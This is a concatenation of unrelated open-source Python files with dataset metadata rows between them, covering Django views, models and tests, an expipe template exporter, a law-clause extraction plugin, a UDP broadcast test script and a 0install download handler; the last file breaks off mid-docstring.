class SearchFormView(FormView, SearchFormViewMixin):
    """FormView for search pages: a FormView with GET-bound search forms."""
class UpdateView2(UpdateView):
    """UpdateView that redirects to the object's URL and lets subclasses
    inject extra template context via add_context()."""
    def get_success_url(self):
        # Redirect to the updated object's own page.
        return self.object.get_absolute_url()
    def get_context_data(self, **kwargs):
        c = super(UpdateView2, self).get_context_data(**kwargs)
        c.update(self.add_context())
        return c
    def add_context(self):
        # Hook for subclasses; the default adds nothing.
        return {}
class UserUpdateView(UpdateView2):
    """UpdateView2 whose form receives the current user as a kwarg."""
    def get_form_kwargs(self):
        # NOTE(review): super(UpdateView2, ...) skips UpdateView2 itself in
        # the MRO -- confirm whether super(UserUpdateView, ...) was intended.
        d = super(UpdateView2, self).get_form_kwargs()
        d.update(dict(user=self.request.user))
        return d
class CreateView2(CreateView):
    """CreateView with an optional add_context() hook and a form that
    receives the current user as a kwarg."""
    def get_context_data(self, **kwargs):
        c = super(CreateView2, self).get_context_data(**kwargs)
        # add_context is optional here, unlike in UpdateView2.
        if hasattr(self, "add_context"):
            c.update(self.add_context())
        return c
    def get_form_kwargs(self):
        d = super(CreateView2, self).get_form_kwargs()
        d.update(dict(user=self.request.user))
        return d
class OwnObjMixin(SingleObjectMixin):
    """Access object, checking that it belongs to current user."""
    item_name = None # used in permissions error message
    owner_field = "creator" # object's field to compare to current user to check permission
    def perm_error(self):
        # Plain 200 response with a permissions message (not a 403).
        return HttpResponse("You don't have permissions to access this %s." % self.item_name)
    def validate(self, obj):
        # Returns True for the owner, implicitly None otherwise.
        if getattr(obj, self.owner_field) == self.request.user:
            return True
    def get_object(self, queryset=None):
        obj = super(OwnObjMixin, self).get_object(queryset)
        # NOTE(review): returning None (instead of raising/perm_error) may
        # crash generic-view callers that expect an object -- confirm.
        if not self.validate(obj): return None
        return obj
class DeleteOwnObjView(OwnObjMixin, DeleteView):
    """Delete object, checking that it belongs to the current user."""
class UpdateOwnObjView(OwnObjMixin, UpdateView2):
    """Update object, checking that it belongs to the current user."""
class SearchEditFormset(SearchFormView):
    """Search form filtering a formset of items to be updated.

    GET renders the search form (form_class) plus a formset of matching
    objects; POST validates and saves the formset (formset_class).
    """
    model = None
    formset_class = None
    form_class = None
    def get_form_class(self):
        # GET binds the search form; POST binds the edit formset.
        if self.request.method == "GET": return self.form_class
        else: return self.formset_class
    def get_queryset(self, form=None):
        return self.model.objects.filter(self.get_query(form))
    def get_query(self, form):
        """This method should always be overridden, applying search from the `form`."""
        return Q()
    def form_valid(self, form):
        formset = None
        if self.request.method == "GET":
            # Valid search: build the formset over the filtered queryset.
            formset = self.formset_class(queryset=self.get_queryset(form))
        else:
            # Valid formset submission: save and re-render the search form.
            form.save()
            messages.success(self.request, "%s(s) were updated successfully" % self.model.__name__.capitalize())
            formset = form
            form = self.form_class(self.request.GET)
        return self.render_to_response(self.get_context_data(form=form, formset=formset))
    def form_invalid(self, form):
        # Re-render with the invalid formset and a fresh search form.
        formset = form
        form = self.form_class(self.request.GET)
        return self.render_to_response(self.get_context_data(form=form, formset=formset))
    def get(self, request, *args, **kwargs):
        form = self.get_form()
        if form.is_bound:
            if form.is_valid(): return self.form_valid(form)
            else: return self.form_invalid(form)
        return self.render_to_response(self.get_context_data(form=form))
class CreateWithFormset(FormView):
    """ Create multiple objects using a formset.

    Passes user as an arg to each form init function.
    """
    model = None
    form_class = None
    extra = 5  # number of blank forms in the formset
    def get_form(self, form_class=None):
        # Build a formset class on the fly; curry binds the current user
        # into every member form's constructor.
        Formset = formsets.formset_factory(self.form_class, extra=self.extra)
        Formset.form = staticmethod(curry(self.form_class, user=self.request.user))
        return Formset(**self.get_form_kwargs())
    def post(self, request, *args, **kwargs):
        self.object = None
        formset = self.get_form()
        if formset.is_valid():
            return self.form_valid(formset)
        else:
            return self.form_invalid(formset)
    def form_valid(self, formset):
        # Save only the forms the user actually filled in.
        for form in formset:
            if form.has_changed():
                form.save()
        return HttpResponseRedirect(reverse(self.success_url_name))
    def form_invalid(self, form):
        return self.render_to_response(self.get_context_data(form=form))
    def get_context_data(self, **kwargs):
        context = super(CreateWithFormset, self).get_context_data(**kwargs)
        return updated( context, dict(formset=self.get_form()) )
| bsd-3-clause | -6,290,611,191,496,170,000 | 32.325581 | 112 | 0.629449 | false | 3.834114 | false | false | false |
CINPLA/expipe-dev | expipe-templates-cinpla/get_templates.py | 1 | 1153 | import expipe
import os.path as op
import os
import json
# Export expipe templates from Firebase into per-group JSON files under
# templates/<group>/<name>.json, skipping 'person' templates.
overwrite = True  # overwrite existing JSON files on disk
base_dir = op.join(op.abspath(op.dirname(op.expanduser(__file__))), 'templates')
templates = expipe.core.FirebaseBackend("/templates").get()
for template, val in templates.items():
    identifier = val.get('identifier')
    if identifier is None:
        continue
    path = template.split('_')[0]
    name = identifier.split('_')[1:]
    if path == 'person':
        continue
    if len(name) == 0:
        continue
    # NOTE(review): this raise is unconditional for every template that
    # passes the checks above, so the loop can never reach the code below;
    # the raise was probably meant to replace the `continue` in the
    # len(name) == 0 branch -- confirm against upstream history.
    raise ValueError('No grouping on template "' + template + '"')
    fbase = '_'.join(name)
    fname = op.join(base_dir, path, fbase + '.json')
    result = expipe.get_template(template=template)
    if op.exists(fname) and not overwrite:
        # NOTE(review): "ovewrite" typo is in the runtime message; left as-is.
        raise FileExistsError('The filename "' + fname +
                              '" exists, set ovewrite to true.')
    os.makedirs(op.dirname(fname), exist_ok=True)
    print('Saving template "' + template + '" to "' + fname + '"')
    with open(fname, 'w') as outfile:
        result = expipe.core.convert_to_firebase(result)
        json.dump(result, outfile,
                  sort_keys=True, indent=4)
| gpl-3.0 | -6,103,008,432,294,853,000 | 33.939394 | 80 | 0.611448 | false | 3.743506 | false | false | false |
prontodev/stillwithus | stillwithus/clientsites/tests.py | 1 | 6014 | from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from .models import ClientSite
from servers.models import Server
class ClientSiteTest(TestCase):
    """Model-level tests for ClientSite."""
    def test_create_new_clientsite(self):
        # Saving assigns a primary key and persists the domain.
        clientsite = ClientSite()
        clientsite.domain = 'www.atlasperformancechicago.com'
        self.assertFalse(clientsite.id)
        clientsite.save()
        self.assertTrue(clientsite.id)
        clientsite = ClientSite.objects.get(id=clientsite.id)
        self.assertEqual(clientsite.domain, 'www.atlasperformancechicago.com')
class ClientSiteViewTest(TestCase):
    """View tests for the 'clientsites' page (rendering and DNS checks)."""
    def setUp(self):
        self.url = reverse('clientsites')
    def test_clientsite_should_be_accessible(self):
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
    def test_clientsite_should_use_correct_template(self):
        response = self.client.get(self.url)
        self.assertTemplateUsed(response, 'clientsites.html')
    def test_clientsite_should_have_title(self):
        response = self.client.get(self.url)
        expected = '<title>Still with Us?</title>'
        self.assertContains(response, expected, status_code=200)
    def test_clientsite_should_render_html_for_clientsites_correctly(self):
        response = self.client.get(self.url)
        expected = '<h1>Client Sites</h1>'
        self.assertContains(response, expected, status_code=200)
        expected = '<thead><tr><th>Domain</th><th>Still with Us?'
        expected += '</th><th>Note</th></tr></thead>'
        self.assertContains(response, expected, status_code=200)
    def test_clientsite_should_query_domains_and_check_if_still_with_us(self):
        # NOTE(review): this test resolves real domains against the stored
        # server IPs, so it depends on live DNS -- results may drift.
        Server.objects.bulk_create([
            Server(name='Pronto 1', ip='54.72.3.133'),
            Server(name='Pronto 2', ip='54.72.3.103'),
            Server(name='Pronto 3', ip='54.252.146.70'),
            Server(name='Pronto 4', ip='54.67.50.151'),
            Server(name='Pronto 5', ip='52.1.32.33'),
            Server(name='Pronto 6', ip='27.254.65.18'),
            Server(name='Pronto 7', ip='54.246.93.4'),
            Server(name='Pronto 8', ip='54.228.219.35'),
            Server(name='Pronto 9', ip='54.72.3.253'),
            Server(name='Pronto 10', ip='54.171.171.172'),
            Server(name='Pronto 11', ip='46.137.96.191'),
            Server(name='Pronto 12', ip='54.194.28.91'),
            Server(name='Pronto 13', ip='54.72.53.55'),
        ])
        ClientSite.objects.bulk_create([
            ClientSite(domain='www.prontomarketing.com'),
            ClientSite(domain='www.atlasperformancechicago.com'),
        ])
        response = self.client.get(self.url)
        # Domain not resolving to a known server renders a red "No".
        expected = '<tr><td><a href="http://www.prontomarketing.com" '
        expected += 'target="_blank">www.prontomarketing.com</a></td>'
        expected += '<td style="color: red;">No</td><td>---</td></tr>'
        self.assertContains(response, expected, count=1, status_code=200)
        expected = '<td><a href="http://www.prontomarketing.com" '
        expected += 'target="_blank">www.prontomarketing.com</a></td>'
        self.assertContains(response, expected, count=1, status_code=200)
        # Domain resolving to a known server renders "Yes".
        expected = '<tr><td><a href="http://www.atlasperformancechicago.com" '
        expected += 'target="_blank">www.atlasperformancechicago.com</a></td>'
        expected += '<td>Yes</td><td>---</td></tr>'
        self.assertContains(response, expected, count=1, status_code=200)
        expected = '<td><a href="http://www.atlasperformancechicago.com" '
        expected += 'target="_blank">www.atlasperformancechicago.com</a></td>'
        self.assertContains(response, expected, count=1, status_code=200)
    def test_clientsite_should_add_note_if_cannot_get_ip(self):
        ClientSite.objects.create(
            domain='dayton.kaiafit.com'
        )
        response = self.client.get(self.url)
        expected = '<tr><td><a href="http://dayton.kaiafit.com" '
        expected += 'target="_blank">dayton.kaiafit.com</a></td>'
        expected += '<td>---</td><td>Cannot get IP</td></tr>'
        self.assertContains(response, expected, count=1, status_code=200)
    def test_clientsite_should_render_html_for_servers_correctly(self):
        response = self.client.get(self.url)
        expected = '<h1>Servers</h1>'
        self.assertContains(response, expected, status_code=200)
        expected = '<thead><tr><th>Name</th><th>IP</th></tr></thead>'
        self.assertContains(response, expected, status_code=200)
    def test_clientsite_should_query_server_name_and_ip_correctly(self):
        Server.objects.create(
            name='AWS ELB',
            ip='54.72.3.133'
        )
        Server.objects.create(
            name='Bypronto',
            ip='54.171.171.172'
        )
        response = self.client.get(self.url)
        expected = '<tr><td>AWS ELB</td><td>54.72.3.133</td></tr>'
        self.assertContains(response, expected, status_code=200)
        expected = '<tr><td>Bypronto</td><td>54.171.171.172</td></tr>'
        self.assertContains(response, expected, status_code=200)
class ClientSiteAdminTest(TestCase):
    """Admin-site tests for the ClientSite changelist."""
    def setUp(self):
        # Log in as a superuser so the admin changelist is reachable.
        admin = User.objects.create_superuser(
            'admin',
            '[email protected]',
            'password'
        )
        self.client.login(
            username='admin',
            password='password'
        )
        self.url = '/admin/clientsites/clientsite/'
    def test_clientsite_admin_page_should_be_accessible(self):
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
    def test_clientsite_admin_page_should_name_and_domain_columns(self):
        ClientSite.objects.create(
            domain='www.prontomarketing.com'
        )
        response = self.client.get(self.url)
        # Sortable "Domain" column header in the changelist table.
        expected = '<div class="text"><a href="?o=1">Domain</a></div>'
        self.assertContains(response, expected, status_code=200)
| mit | -631,185,773,679,272,400 | 37.305732 | 78 | 0.618557 | false | 3.490424 | true | false | false |
MMohan1/dwitter | dwitter_app/models.py | 1 | 1342 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
import hashlib
class Dweet(models.Model):
    """A single short post by a user."""
    # 140-character limit mirrors the classic tweet length.
    content = models.CharField(max_length=140)
    user = models.ForeignKey(User)
    creation_date = models.DateTimeField(auto_now=True, blank=True)
class UserProfile(models.Model):
    """Per-user profile; exposed lazily as ``user.profile``."""
    user = models.ForeignKey(User)
    # follows = models.ManyToManyField('self', related_name='followed_by', symmetrical=False)

    def gravatar_url(self):
        """Return the 50px Gravatar URL for this profile's user.

        The address is encoded to UTF-8 bytes before hashing: hashlib.md5
        rejects str on Python 3 and non-ASCII unicode on Python 2, so the
        original ``md5(self.user.email)`` raised in both cases.
        NOTE(review): the Gravatar spec also trims and lowercases the
        address before hashing; doing so here would change existing URLs,
        so it is left to a deliberate follow-up.
        """
        digest = hashlib.md5(self.user.email.encode('utf-8')).hexdigest()
        return "http://www.gravatar.com/avatar/%s?s=50" % digest


# Lazily create-and-attach a profile the first time user.profile is read.
User.profile = property(lambda u: UserProfile.objects.get_or_create(user=u)[0])
class Follow(models.Model):
    """Directed follow edge: follower -> following."""
    follower = models.ForeignKey(User, related_name='follower')
    following = models.ForeignKey(User, related_name='following')
    follow_date = models.DateTimeField(auto_now=True)
class Likes(models.Model):
    """A user's like on a dweet; one like per (dweet, user) pair."""
    dwitte = models.ForeignKey(Dweet)
    likes = models.ForeignKey(User)
    creation_date = models.DateTimeField(auto_now=True)
    class Meta:
        # A user can like a given dweet at most once.
        unique_together = ("dwitte", "likes")
class Comments(models.Model):
    """A user's comment on a dweet (no uniqueness constraint)."""
    dwitte = models.ForeignKey(Dweet)
    comment_by = models.ForeignKey(User)
    comment = models.TextField()
    creation_date = models.DateTimeField(auto_now=True)
| mit | 5,100,131,809,558,829,000 | 28.822222 | 98 | 0.716095 | false | 3.569149 | false | false | false |
opensemanticsearch/open-semantic-etl | src/opensemanticetl/enhance_extract_law.py | 1 | 5028 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import etl_plugin_core
#
# get taxonomy for aggregated facets / filters
#
# example: '§ 153 Abs. 1 Satz 2' -> ['§ 153', '§ 153 Absatz 1', '§ 153 Absatz 1 Satz 2']
# todo:
def get_taxonomy(law_clause, law_code=None):
    """Return the facet taxonomy entries for a law clause.

    Currently a stub that returns only the clause itself; the intended
    expansion ('§ 153 Abs. 1 Satz 2' -> ['§ 153', '§ 153 Absatz 1',
    '§ 153 Absatz 1 Satz 2']) is still TODO. ``law_code`` is accepted for
    forward compatibility and presently unused.
    """
    return [law_clause]
#1.a
#1(2)
#1 (2)
#
# extract law codes
#
class enhance_extract_law(etl_plugin_core.Plugin):
    """ETL plugin: extract law clause references (e.g. "§ 153 Abs. 1") from text,
    link them to previously matched law codes, and drop blacklisted law-code
    matches that appear without any clause."""
    def process(self, parameters=None, data=None):
        """Extract clauses into ``law_clause_ss``, combine clause+code into
        ``law_code_clause_ss`` and filter blacklisted codes from the data dict.

        Returns the (possibly modified) ``(parameters, data)`` pair.
        """
        if parameters is None:
            parameters = {}
        if data is None:
            data = {}
        # Tokens that introduce a clause reference (German and English).
        clause_prefixes = [
            '§',
            'Article',
            'Artikel',
            'Art',
            'Section',
            'Sec',
        ]
        # Tokens that introduce a sub-division of a clause.
        clause_subsections = [
            'Abschnitt',
            'Absatz',
            'Abs',
            'Sentence',
            'Satz',
            'S',
            'Halbsatz',
            'Number',
            'Nummer',
            'Nr',
            'Buchstabe',
        ]
        text = etl_plugin_core.get_text(data)
        clauses = []
        # Regex: prefix, clause number (e.g. "153" or "1a" or "1.a"), then any
        # number of subsection markers each followed by a number/letter.
        rule = '(' + '|'.join(clause_prefixes) + ')\W*((\d+\W\w(\W|\b))|(\d+\w?))(\W?(' + '|'.join(clause_subsections) + ')\W*(\d+\w?|\w(\W|\b)))*'
        for match in re.finditer(rule, text, re.IGNORECASE):
            clause = match.group(0)
            clause = clause.strip()
            clauses.append(clause)
            # if "§123" normalize to "§ 123"
            if clause[0] == '§' and not clause[1] == ' ':
                clause = '§ ' + clause[1:]
            etl_plugin_core.append(data, 'law_clause_ss', clause)
        # Law-code entity matches produced by an earlier dictionary-matching stage.
        code_matchtexts = etl_plugin_core.get_all_matchtexts(data.get('law_code_ss_matchtext_ss', []))
        code_matchtexts_with_clause = []
        preflabels = {}
        if 'law_code_ss_preflabel_and_uri_ss' in data:
            preflabels = etl_plugin_core.get_preflabels(data['law_code_ss_preflabel_and_uri_ss'])
        if len(clauses)>0 and len(code_matchtexts)>0:
            # Join lines so a clause and code split across a line break still
            # match the adjacency test below.
            text = text.replace("\n", " ")
            for code_match_id in code_matchtexts:
                #get only matchtext (without ID/URI of matching entity)
                for code_matchtext in code_matchtexts[code_match_id]:
                    for clause in clauses:
                        # Clause and code count as linked only when adjacent in the text.
                        if clause + " " + code_matchtext in text or code_matchtext + " " + clause in text:
                            code_matchtexts_with_clause.append(code_matchtext)
                            # if "§123" normalize to "§ 123"
                            if clause[0] == '§' and not clause[1] == ' ':
                                clause = '§ ' + clause[1:]
                            law_code_preflabel = code_match_id
                            if code_match_id in preflabels:
                                law_code_clause_normalized = clause + " " + preflabels[code_match_id]
                            else:
                                law_code_clause_normalized = clause + " " + code_match_id
                            etl_plugin_core.append(data, 'law_code_clause_ss', law_code_clause_normalized)
        if len(code_matchtexts)>0:
            # Codes on this blacklist are kept only when they co-occur with a clause.
            blacklist = []
            listfile = open('/etc/opensemanticsearch/blacklist/enhance_extract_law/blacklist-lawcode-if-no-clause')
            for line in listfile:
                line = line.strip()
                if line and not line.startswith("#"):
                    blacklist.append(line)
            listfile.close()
            if not isinstance(data['law_code_ss_matchtext_ss'], list):
                data['law_code_ss_matchtext_ss'] = [data['law_code_ss_matchtext_ss']]
            blacklisted_code_ids = []
            for code_match_id in code_matchtexts:
                for code_matchtext in code_matchtexts[code_match_id]:
                    if code_matchtext in blacklist:
                        if code_matchtext not in code_matchtexts_with_clause:
                            blacklisted_code_ids.append(code_match_id)
                            # Entries are stored as "id\tmatchtext" pairs.
                            data['law_code_ss_matchtext_ss'].remove(code_match_id + "\t" + code_matchtext)
            # Re-read remaining matches after the removals above.
            code_matchtexts = etl_plugin_core.get_all_matchtexts(data.get('law_code_ss_matchtext_ss', []))
            if not isinstance(data['law_code_ss'], list):
                data['law_code_ss'] = [data['law_code_ss']]
            if not isinstance(data['law_code_ss_preflabel_and_uri_ss'], list):
                data['law_code_ss_preflabel_and_uri_ss'] = [data['law_code_ss_preflabel_and_uri_ss']]
            for blacklisted_code_id in blacklisted_code_ids:
                # Drop facet entries for codes that now have no surviving match at all.
                if blacklisted_code_id not in code_matchtexts:
                    data['law_code_ss'].remove(preflabels[blacklisted_code_id])
                    data['law_code_ss_preflabel_and_uri_ss'].remove(preflabels[blacklisted_code_id] + ' <' + blacklisted_code_id + '>')
        return parameters, data
| gpl-3.0 | -8,537,179,740,462,621,000 | 32.657718 | 147 | 0.498504 | false | 3.701107 | false | false | false |
LeonidasAntoniou/dk-plus | test files/beacon.py | 1 | 1799 | """
A simple program that sends/listens broadcast packets through UDP socket
Used to test the system if it is able to send/receive packets
"""
import time, math, sys, socket, threading, select, uuid
from collections import namedtuple
import cPickle as pickle
from params import Params
MAX_STAY = 5 #seconds until entry is removed from structure
Geo = namedtuple("Geo", "lat lon")
simple_msg = namedtuple("simple_msg", "ID text")
self_params = Params(dummy=True)  # this node's own parameters (dummy data for the test)
# Set the socket parameters
address = ('192.168.1.255', 54545) # host, port
# Broadcast sender socket.
sock_broad = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock_broad.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Create socket and bind to address
sock_listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_listen.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock_listen.bind(address)
def broad():
    """Broadcast this node's parameters over UDP once per second, forever."""
    while True:
        #msg = simple_msg(self_id,"I am here")
        msg = self_params
        # sendto returns the byte count; assert guards against a zero-byte send.
        assert sock_broad.sendto(pickle.dumps(msg), address), "Message failed to send"
        time.sleep(1)
def listen():
    """Receive broadcast packets, ignoring our own, and print the others."""
    print "Waiting for message"
    while True:
        try:
            # 1-second select timeout so the loop stays responsive.
            ready = select.select([sock_listen], [], [], 1.0)
            if ready[0]:
                d = sock_listen.recvfrom(4096)
                raw_msg = d[0]
                try:
                    msg = pickle.loads(raw_msg)
                    if msg.ID == self_params.ID:
                        pass  # our own broadcast echoed back — ignore
                    else:
                        print "From addr: '%s', msg: '%s'" % (d[1], msg)
                except Exception, e:
                    print "Error in receiving: ", e
        except socket.timeout:
            # NOTE(review): select() does not raise socket.timeout, and
            # threading.Thread has no cancel() — this branch looks unreachable/broken.
            print "Reached timeout. Closing..."
            t_listen.cancel()
            sock_listen.close()
# Run sender and receiver concurrently as daemon threads for a fixed test window.
t_listen = threading.Thread(target=listen)
t_broad = threading.Thread(target=broad)
t_listen.daemon = True
t_broad.daemon = True
t_listen.start()
t_broad.start()
time.sleep(100) #test for 100s
print "Closing beacon"
| gpl-3.0 | -9,053,915,557,494,988,000 | 25.850746 | 81 | 0.699277 | false | 3.101724 | false | false | false |
afb/0install | zeroinstall/injector/handler.py | 1 | 9160 | """
Integrates download callbacks with an external mainloop.
While things are being downloaded, Zero Install returns control to your program.
Your mainloop is responsible for monitoring the state of the downloads and notifying
Zero Install when they are complete.
To do this, you supply a L{Handler} to the L{policy}.
"""
# Copyright (C) 2009, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from __future__ import print_function
from zeroinstall import _, logger
import sys
if sys.version_info[0] < 3:
import __builtin__ as builtins
else:
import builtins
from zeroinstall import SafeException
from zeroinstall import support
from zeroinstall.support import tasks
from zeroinstall.injector import download
class NoTrustedKeys(SafeException):
    """Thrown by L{Handler.confirm_import_feed} when the user declines to trust
    any of the keys that signed a feed."""
    pass
class Handler(object):
    """
    A Handler is used to interact with the user (e.g. to confirm keys, display download progress, etc).
    @ivar monitored_downloads: set of downloads in progress
    @type monitored_downloads: {L{download.Download}}
    @ivar n_completed_downloads: number of downloads which have finished for GUIs, etc (can be reset as desired).
    @type n_completed_downloads: int
    @ivar total_bytes_downloaded: informational counter for GUIs, etc (can be reset as desired). Updated when download finishes.
    @type total_bytes_downloaded: int
    @ivar dry_run: don't write or execute any files, just print notes about what we would have done to stdout
    @type dry_run: bool
    """
    __slots__ = ['monitored_downloads', 'dry_run', 'total_bytes_downloaded', 'n_completed_downloads']
    def __init__(self, mainloop = None, dry_run = False):
        """@type dry_run: bool"""
        # mainloop is accepted for interface compatibility but unused here.
        self.monitored_downloads = set()
        self.dry_run = dry_run
        self.n_completed_downloads = 0
        self.total_bytes_downloaded = 0
    def monitor_download(self, dl):
        """Called when a new L{download} is started.
        This is mainly used by the GUI to display the progress bar.
        @type dl: L{zeroinstall.injector.download.Download}"""
        self.monitored_downloads.add(dl)
        self.downloads_changed()
        # Async task: waits for the download to finish, then updates the counters.
        @tasks.async
        def download_done_stats():
            yield dl.downloaded
            # NB: we don't check for exceptions here; someone else should be doing that
            try:
                self.n_completed_downloads += 1
                self.total_bytes_downloaded += dl.get_bytes_downloaded_so_far()
                self.monitored_downloads.remove(dl)
                self.downloads_changed()
            except Exception as ex:
                self.report_error(ex)
        download_done_stats()
    def impl_added_to_store(self, impl):
        """Called by the L{fetch.Fetcher} when adding an implementation.
        The GUI uses this to update its display.
        @param impl: the implementation which has been added
        @type impl: L{model.Implementation}"""
        pass
    def downloads_changed(self):
        """This is just for the GUI to override to update its display."""
        pass
    @tasks.async
    def confirm_import_feed(self, pending, valid_sigs, retval):
        """Sub-classes should override this method to interact with the user about new feeds.
        If multiple feeds need confirmation, L{trust.TrustMgr.confirm_keys} will only invoke one instance of this
        method at a time.
        @param pending: the new feed to be imported
        @type pending: L{PendingFeed}
        @param valid_sigs: maps signatures to a list of fetchers collecting information about the key
        @type valid_sigs: {L{gpg.ValidSig} : L{fetch.KeyInfoFetcher}}
        @since: 0.42"""
        from zeroinstall.injector import trust
        assert valid_sigs
        domain = trust.domain_from_url(pending.url)
        # Ask on stderr, because we may be writing XML to stdout
        print(_("Feed: %s") % pending.url, file=sys.stderr)
        print(_("The feed is correctly signed with the following keys:"), file=sys.stderr)
        for x in valid_sigs:
            print("-", x, file=sys.stderr)
        # Collect the text content of a DOM node's direct text children.
        def text(parent):
            text = ""
            for node in parent.childNodes:
                if node.nodeType == node.TEXT_NODE:
                    text = text + node.data
            return text
        shown = set()
        key_info_fetchers = valid_sigs.values()
        # Poll the key-info fetchers, printing new info as it arrives, until
        # they all finish or the user presses a key.
        while key_info_fetchers:
            old_kfs = key_info_fetchers
            key_info_fetchers = []
            for kf in old_kfs:
                infos = set(kf.info) - shown
                if infos:
                    if len(valid_sigs) > 1:
                        # NOTE(review): unlike the other messages this one goes to
                        # stdout (no file=sys.stderr) — possibly unintentional.
                        print("%s: " % kf.fingerprint)
                    for key_info in infos:
                        print("-", text(key_info), file=sys.stderr)
                        shown.add(key_info)
                    if kf.blocker:
                        key_info_fetchers.append(kf)
            if key_info_fetchers:
                for kf in key_info_fetchers: print(kf.status, file=sys.stderr)
                stdin = tasks.InputBlocker(0, 'console')
                blockers = [kf.blocker for kf in key_info_fetchers] + [stdin]
                yield blockers
                for b in blockers:
                    try:
                        tasks.check(b)
                    except Exception as ex:
                        logger.warning(_("Failed to get key info: %s"), ex)
                if stdin.happened:
                    print(_("Skipping remaining key lookups due to input from user"), file=sys.stderr)
                    break
        if not shown:
            print(_("Warning: Nothing known about this key!"), file=sys.stderr)
        if len(valid_sigs) == 1:
            print(_("Do you want to trust this key to sign feeds from '%s'?") % domain, file=sys.stderr)
        else:
            print(_("Do you want to trust all of these keys to sign feeds from '%s'?") % domain, file=sys.stderr)
        # Loop until the user gives a definite yes/no answer.
        while True:
            print(_("Trust [Y/N] "), end=' ', file=sys.stderr)
            sys.stderr.flush()
            i = support.raw_input()
            if not i: continue
            if i in 'Nn':
                raise NoTrustedKeys(_('Not signed with a trusted key'))
            if i in 'Yy':
                break
        trust.trust_db._dry_run = self.dry_run
        # Report the accepted fingerprints back through the caller-supplied list.
        retval.extend([key.fingerprint for key in valid_sigs])
    @tasks.async
    def confirm_install(self, msg):
        """We need to check something with the user before continuing with the install.
        @raise download.DownloadAborted: if the user cancels"""
        yield
        print(msg, file=sys.stderr)
        while True:
            sys.stderr.write(_("Install [Y/N] "))
            sys.stderr.flush()
            i = support.raw_input()
            if not i: continue
            if i in 'Nn':
                raise download.DownloadAborted()
            if i in 'Yy':
                break
    def report_error(self, exception, tb = None):
        """Report an exception to the user.
        @param exception: the exception to report
        @type exception: L{SafeException}
        @param tb: optional traceback
        @since: 0.25"""
        import logging
        # Include the full traceback only when INFO logging is enabled.
        logger.warning("%s", str(exception) or type(exception),
                exc_info = (exception, exception, tb) if logger.isEnabledFor(logging.INFO) else None)
class ConsoleHandler(Handler):
    """A Handler that displays progress on stderr (a tty).
    (we use stderr because we use stdout to talk to the OCaml process)
    @since: 0.44"""
    # Length of the last progress line written (None = nothing displayed).
    last_msg_len = None
    # Periodic redraw timer handle (None when no progress is being shown).
    update = None
    # When > 0, progress redrawing is suppressed (e.g. during key confirmation).
    disable_progress = 0
    # Terminal width in columns, detected lazily via curses.
    screen_width = None
    # While we are displaying progress, we override builtins.print to clear the display first.
    original_print = None
    def downloads_changed(self):
        """Start or stop the periodic progress display as downloads come and go."""
        if self.monitored_downloads and self.update is None:
            if self.screen_width is None:
                try:
                    import curses
                    curses.setupterm()
                    self.screen_width = curses.tigetnum('cols') or 80
                except Exception as ex:
                    logger.info("Failed to initialise curses library: %s", ex)
                    self.screen_width = 80
            self.show_progress()
            self.original_print = print
            builtins.print = self.print
            self.update = tasks.get_loop().call_repeatedly(0.2, self.show_progress)
        elif len(self.monitored_downloads) == 0:
            if self.update:
                self.update.cancel()
                self.update = None
                builtins.print = self.original_print
                self.original_print = None
                self.clear_display()
    def show_progress(self):
        """Redraw one status line summarising every download in progress."""
        if not self.monitored_downloads: return
        urls = [(dl.url, dl) for dl in self.monitored_downloads]
        if self.disable_progress: return
        screen_width = self.screen_width - 2
        # Divide the line evenly between downloads, at least 16 columns each.
        item_width = max(16, screen_width // len(self.monitored_downloads))
        url_width = item_width - 7
        msg = ""
        for url, dl in sorted(urls):
            so_far = dl.get_bytes_downloaded_so_far()
            if url.endswith('/latest.xml'):
                url = url[:-10] # remove latest.xml from mirror URLs
            leaf = url.rsplit('/', 1)[-1]
            if len(leaf) >= url_width:
                display = leaf[:url_width]
            else:
                display = url[-url_width:]
            if dl.expected_size:
                msg += "[%s %d%%] " % (display, int(so_far * 100 / dl.expected_size))
            else:
                msg += "[%s] " % (display)
        msg = msg[:screen_width]
        if self.last_msg_len is None:
            sys.stderr.write(msg)
        else:
            # chr(13) is carriage return: rewrite the line in place, padding
            # with spaces if the new message is shorter than the old one.
            sys.stderr.write(chr(13) + msg)
            if len(msg) < self.last_msg_len:
                sys.stderr.write(" " * (self.last_msg_len - len(msg)))
        self.last_msg_len = len(msg)
        sys.stderr.flush()
        return
    def clear_display(self):
        """Blank out the progress line so other output can be printed cleanly."""
        if self.last_msg_len != None:
            sys.stderr.write(chr(13) + " " * self.last_msg_len + chr(13))
            sys.stderr.flush()
            self.last_msg_len = None
    def report_error(self, exception, tb = None):
        self.clear_display()
        Handler.report_error(self, exception, tb)
    def confirm_import_feed(self, pending, valid_sigs, retval):
        """Suspend the progress display while the user confirms keys."""
        self.clear_display()
        self.disable_progress += 1
        blocker = Handler.confirm_import_feed(self, pending, valid_sigs, retval)
        @tasks.async
        def enable():
            # Re-enable progress once the confirmation dialogue finishes.
            yield blocker
            self.disable_progress -= 1
            self.show_progress()
        enable()
        return blocker
    def print(self, *args, **kwargs):
        # Replacement for builtins.print: clear the progress line first.
        self.clear_display()
        self.original_print(*args, **kwargs)
| lgpl-2.1 | 4,241,712,712,980,864,500 | 31.253521 | 125 | 0.69083 | false | 3.199441 | false | false | false |
OpenDroneMap/WebODM | app/api/common.py | 1 | 1763 | from django.core.exceptions import ObjectDoesNotExist, SuspiciousFileOperation
from rest_framework import exceptions
import os
from app import models
def get_and_check_project(request, project_pk, perms=('view_project',)):
    """
    Django comes with a standard `model level` permission system. You can
    check whether users are logged-in and have privileges to act on things
    model wise (can a user add a project? can a user view projects?).
    Django-guardian adds a `row level` permission system. Now not only can you
    decide whether a user can add a project or view projects, you can specify exactly
    which projects a user has or has not access to.
    This brings up the reason the following function: tasks are part of a project,
    and it would add a tremendous headache (and redundancy) to specify row level permissions
    for each task. Instead, we check the row level permissions of the project
